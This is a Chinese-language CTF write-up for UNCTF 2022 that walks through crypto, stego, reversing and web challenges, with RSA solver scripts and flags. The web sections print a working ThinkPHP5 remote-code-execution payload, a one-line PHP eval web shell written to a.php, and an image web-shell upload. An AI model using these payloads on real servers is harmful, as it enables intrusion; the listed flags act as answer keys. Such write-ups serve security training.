目录
1. Alien's_secret-中国人民公安大学
利用附件中的pdf文件google来搜图,然后会找到一个相似的结果,点进去查看这个网站,就找到了密文对照表了
The 'Alien' font used in the background (uazu.net)https://uazu.net/notes/alien.html
对照表解密就可以啦
UNCTF{W0w_y0u_f!nd_my_s3cr3t!}
2. welcomeUNCTF2022-云南警官学院
拿到附件直接ida打开,f5看伪代码
代码审计一下,passward就是UNCTF&2022
然后就ok了
UNCTF{469391aa-cd90-4233-8c47-5a802b29ca1c}
3. md5-1-西南科技大学
其实这题只用txt附件就可以做出来,当然也可以写jio本,由于本人非常菜,就用前者做了
其实看脚本和这个txt不难想到txt是类似字典的东西,就是将flag里面每一个元素都分别md5加密
然后我就利用md5解密在线网站,尝试解了前面几行MD5,发现是UNCTF{}的格式,思路正确,继续往下解就可以解出flag了
下面贴上两个网站: md5在线解密破解,md5解密加密 https://www.sojson.com/encrypt_md5.html/
UNCTF{e84fed028b9046fc0e8f080e96e72184}
4. dddd-西南科技大学
看到题目dddd,一眼丁真为莫斯密码,把1替换成. 把0替换成-,用在线解密网站解密即可
UNCTF{Y4S_TH1S_JUST_M0RSE}
5. Single table-西南科技大学
看题目,一眼丁真单表置换,按照给的例子的规律,自己排出来一个表
然后就是解密了,按照规律,两个字母一组,取表上两个字母分为原点的坐标系的交点的字母来代换原字母
然后按照密文
OTUBM{BCQS_PHW_OQAU_AYFMKLWS}
排出来这个
UNCTF{GODY_OUK_NOWP_LAYFAIRX}
实在没有想到,居然还要把格式变一下…………然后把x删掉,有点无语…..
最终flag
UNCTF{GOD_YOU_KNOW_PLAYFAIR}
6. syslog-浙江师范大学
一眼丁真日志审查,直接检索password,
解base64得到zip的解压密码
完事
unctf{N1_sH3_D0n9_L0g_dE!}
7. 我太喜欢bilibili大学啦--中北大学
打开检索flag就行了
UNCTF{7932a1ec-33de-488d-bc49-8cb6c1a9e12a}
8. babyphp-中国人民公安大学
打开康康
用a=0. 绕过
找两个明文不同但sha1值相同的
key1=aaroZmOk&key2=aaK1STfY
过滤了这些东西,其实可以直接再传一个命令执行的eval上去,因为被没有过滤,然后你就可以为所欲为了
先system(‘ls’ /);扫一下根目录,然后cat就行了
这里就上最后cat的图
UNCTF{99hanDis_pHP_Ba_True_flag}
9. 302与深大-深圳大学
很显然,这题是302重定向
不用想这么多直接上curl
这样之后会有一长串的报文,太长了就不贴出来了
复制一下到记事本,然后检索flag就行了
UNCTF{thai_miku_micgo_qka_WEB_GOD}
10. easy_upload-云南警官学院
Isctf原题
上传一个图片(png)🐎
然后antsward连上去就行了
UNCTF{e28afad1-19ca-4ae4-8d66-4aad2d835713}
11. 清和fan-江西警察学院
用winrar打开压缩包得到hint
然后就是上b站找了,
第一层密码, 836885_2022/05/20
然后就是一张图片,直接用解lsb隐写
得到
第二层密码:qq857488580
然后就是一个音频隐写
用sstv解就行了
第三层密码:V@mpir3
最后就是零宽隐写
直接用这个网站:Unicode Steganography with Zero-Width Characters (330k.github.io)
‘flag
UNCTF{wha1e_wants_a_girlfriend_like_alicia}
12. magic_word-西南科技大学
直接手机打开附件,上网站
网站:Offdev.net - Zero-width space steganography javascript demo
13. ezgame-浙江师范大学
真正的签到题,3分钟通关
UNCTF{c5f9a27d-6f88-49fb-a510-fe7b163f8dd3}
当然在js文件里面检索UNCTF也可以找到flag
14. easy_RSA-中国人民公安大学
考点:高位p泄露攻击
这里的给出的p位运算之后的结果,因为位运算,把原来p的余数给吞掉了,
靠这里给出了部分的p,
可以利用p高位泄露攻击来求出来原来的p
求求出p问题就迎刃而解了
写个小jio本
然后就可以收工了
下面是原题的代码
|
from Crypto.Util.number import *
from gmpy2 import *
from secret import flag
import random
assert flag.startwith(b"flag{")
e=0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
m=bytes_to_long(flag)
p=getprime(512)
q=getprime(512)
n=p*q
c=pow(m,e,n)
print("n={}".format(n))
print("c={}".format(c))
tmp=random.randint(100,300) #生成从100-300的随机数
print("p>>tmp={}".format(p>>tmp))
#c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
#n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
#p>>200=8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857
exp:
from sage.all import *
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p4=8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857
e = 0x10001
pbits = 512
kbits = pbits - p4.nbits()
print(p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))
f = x + p4
roots = f.small_roots(X=2^kbits, beta=0.4)
if roots:
p = p4+int(roots[0])
print ("n: ", n)
print ("p: ", p)
print ("q: ", n/p)
用sage来跑
跑出来p和q
然后就是基础jio本解密了
最后jio本:
from Crypto.Util.number import *
from gmpy2 import *
e=0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p=13150231070519276795503757637337326535824298772055543325920447062237907554543786311611680606624189166397403108357856813812282725390555389844248256805325917
q=7763324082495716852870824316200424018139567206154696104953385573761033160220038511251268217230653629388520339723337700045392099450472580225771046069366909
phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
然后就能跑出来flag了
UNCTF{It is a very_intersting_test!!!}
15.caesar-西南科技大学
我是菜鸡,不会写jio本,呜呜呜,直接找规律手搓
对照base64的表
B6vAy—UNCTF
B-U=1-20(增加了19)
6-N=58-13(减少了45)
以此类推后面3个字母发现,当字母表值小于19时,就加上19,大于45时就减去45
然后就手搓剩下的啦
UNCTF{w0w_Th1s_d1fFerent_c4eSar}
16.whereisyourkey-广东海洋大学
用ida打开,然后f5看伪代码
发现关键函数,双击查看
显然就是一个简单的c的if嵌套,搞懂代码的意思,然后结合前面给出的v5[]数组,
进行转换,然后ASCII码转字符就可以了
UNCTF{yesiamflag}
17. babyRSA-广东海洋大学
一眼丁真m高位泄露(原题代码就不贴出来了捏)
Sage跑个jio本
def phase2(high_m, n, c):
R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
m = high_m + x
M = m((m^6 - c).small_roots()[0])
print(M)
n= 25300208242652033869357280793502260197802939233346996226883788604545558438230715925485481688339916461848731740856670110424196191302689278983802917678262166845981990182434653654812540700781253868833088711482330886156960638711299829638134615325986782943291329606045839979194068955235982564452293191151071585886524229637518411736363501546694935414687215258794960353854781449161486836502248831218800242916663993123670693362478526606712579426928338181399677807135748947635964798646637084128123883297026488246883131504115767135194084734055003319452874635426942328780711915045004051281014237034453559205703278666394594859431
e= 6
c= 15389131311613415508844800295995106612022857692638905315980807050073537858857382728502142593301948048526944852089897832340601736781274204934578234672687680891154129252310634024554953799372265540740024915758647812906647109145094613323994058214703558717685930611371268247121960817195616837374076510986260112469914106674815925870074479182677673812235207989739299394932338770220225876070379594440075936962171457771508488819923640530653348409795232033076502186643651814610524674332768511598378284643889355772457510928898105838034556943949348749710675195450422905795881113409243269822988828033666560697512875266617885514107
high_m= 11941439146252171444944646015445273361862078914338385912062672317789429687879409370001983412365416202240
phase2(high_m, n, c)
跑出来m,再python跑出来flag
M=11941439146252171444944646015445273361862078914338385912062672317789429687879409370002429378909002883709
UNCTF{27a0aac7-76cb-427d-9129-1476360d5d1b}
18. ezRSA-广东海洋大学
一眼丁真,直接用欧拉函数解法的定理
Yafu直接爆破n(也可以写给开4次方的代码)
解出来p之后,就是常规解法了
这题的关键点已经在原题中提示了
然后就是直接常规解法了
import gmpy2
import libnum
n=62927872600012424750752897921698090776534304875632744929068546073325488283530025400224435562694273281157865037525456502678901681910303434689364320018805568710613581859910858077737519009451023667409223317546843268613019139524821964086036781112269486089069810631981766346242114671167202613483097500263981460561
p=89065756791595323358603857939783936930073695697065732353414009005162022399741
c=56959646997081238078544634686875547709710666590620774134883288258992627876759606112717080946141796037573409168410595417635905762691247827322319628226051756406843950023290877673732151483843276348210800329658896558968868729658727981445607937645264850938932045242425625625685274204668013600475330284378427177504
e=65537
phi=p**4-p**3
#p=q&phi=p^r-p^(r-1)=p^(r-1)*(p-1)
d=gmpy2.invert(e,phi)
m=pow(c,d,n)
print(libnum.n2s(int(m)).decode())
UNCTF{pneum0n0ultram01cr0sc0p01cs01l01c0v0lcan0c0n010s01s}
19. 给你一刀-西南科技大学
一眼丁真
thinkphp5的老漏洞了
然后就是payload:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=
这个可以任意代码执行
然后就是最煎熬的找flag环节
找遍目录,用上了find命令,还是找不出来
然后换了一下思路
执行了一下env看环境变量……………..乌鱼子
UNCTF{Y0u_A3r_so_G9eaD_hacker}
解法2:蚁剑连接
Payload:
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php highlight_file(__FILE__); @eval($_POST["a"]);?>' > a.php
> 这个符号会将echo 的结果传到a.php文件里,相当于保存了一个木马到a.php文件
后面直接访问这个a.php文件就可以任意代码执行了,这里用蚁剑连接
打开虚拟终端执行env命令看环境变量
UNCTF{Y0u_A3r_so_G9eaD_hacker}
20. 社什么社-湖南警察学院
把文件缩小
可以看到出来一点点东西
然后看题目是湖南警察学院,想到可能是湖南的景点
当你看到凤凰古城的时候就会觉得似曾相识
然后没错,就是那个
直接md5加密凤凰古城
4F0198127A45F66C07A5B1A2DDA8223C
Flag
UNCTF{4F0198127A45F66C07A5B1A2DDA8223C}
21今晚吃什么-金陵科技学院
打开附件观察,只有零种元素,10000和00000和空格,可以想到是培根密码
把0,1替换一下,0-A, 1-B
然后在线网站解密
得到 RRRARARRRRARAARRAAARARRRRRAARARARRRARRRARRARAARRAARAARR
再替换一下,R—A A---B
UNCTF{CRYPROISFUN}
22. 找得到我吗-闽南师范大学
非预期,打开字体替换(其实这题的flag是一种自输进去的不存在的字体,用该字体写的文档就显示不出来)
Flag:
UNCTF{You_find_me!}
23. 巨鱼-河南理工大学
Png长宽高一把梭
得到一个信息:无所谓我会出手
然后丢进去010发现这里面有其他的文件
然后foremost分离出来
打开有个压缩包,
密码:无所谓我会出手,txt里面是一个假flag,真的在压缩包里面
压缩包是伪加密的,可以winrar修复
然后得到一个png和pptx文件,pptx是加密的
看png文件
这东西是六氯环己烷,俗称666
猜测密码是666
打开pptx翻到最后一页藏了flag,复制文本框里面的到txt文件里就是flag了
UNCTF{y0u_F1nd_1t!}
24.ezzcry广东海洋大学
hint:流密码
看ctfwiki,里面的流密码类型里面,RC4是无需向量加解密的
使用python的Crypto库ARC4来实现解密RC4
这里对ARC4库的一些细节说明一下
- 主要就是利用ARC4的new(传入key) 返回一个rc4对象
- rc4对象在调用加密或者解密函数. 注意key必须是 bytes类型.如果不是要转换为bytes
from Crypto.Cipher import ARC4 #引入ARC4库
from libnum import n2s # 引入libnum库将数据转为字符
enc=n2s(28215806134317522883596419220825657511411006710664649462842055320370860932420278362078094716) #密文转字符
key=n2s(3544952156018063160) #密钥转字符
key = ARC4.new(key) # new(传入key)
rc4=key.decrypt(enc) #用key来解密密文enc
print(rc4) #输出结果
Flag:
UNCTF{83e429d991d24c548b9dbd256975d0d5}
25.Fermat西南科技大学
题目就明确了这题的关键是费马小定理的运用
Jio本:
import gmpy2
from Crypto.Util.number import *
n=19793392713544070457027688479915778034777978273001720422783377164900114996244094242708846944654400975309197274029725271852278868848866055341793968628630614866044892220651519906766987523723167772766264471738575578352385622923984300236873960423976260016266837752686791744352546924090533029391012155478169775768669029210298020072732213084681874537570149819864200486326715202569620771301183541168920293383480995205295027880564610382830236168192045808503329671954996275913950214212865497595508488636836591923116671959919150665452149128370999053882832187730559499602328396445739728918488554797208524455601679374538090229259
c=388040015421654529602726530745444492795380886347450760542380535829893454552342509717706633524047462519852647123869277281803838546899812555054346458364202308821287717358321436303133564356740604738982100359999571338136343563820284214462840345638397346674622692956703291932399421179143390021606803873010804742453728454041597734468711112843307879361621434484986414368504648335684946420377995426633388307499467425060702337163601268480035415645840678848175121483351171989659915143104037610965403453400778398233728478485618134227607237718738847749796204570919757202087150892548180370435537346442018275672130416574430694059
g=gift=28493930909416220193248976348190268445371212704486248387964331415565449421099615661533797087163499951763570988748101165456730856835623237735728305577465527656655424601018192421625513978923509191087994899267887557104946667250073139087563975700714392158474439232535598303396614625803120915200062198119177012906806978497977522010955029535460948754300579519507100555238234886672451138350711195210839503633694262246536916073018376588368865238702811391960064511721322374269804663854748971378143510485102611920761475212154163275729116496865922237474172415758170527875090555223562882324599031402831107977696519982548567367160
e=0x10001
a=(pow(2,g,n)-1)
p=gmpy2.gcd(a,n)
q=n//p
phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
Flag:
UNCTF{DO_y0u_Fermat_1ittle_theOrem}
每日emo:
帘外雨潺潺,春意阑珊。罗衾不耐五更寒。——李煜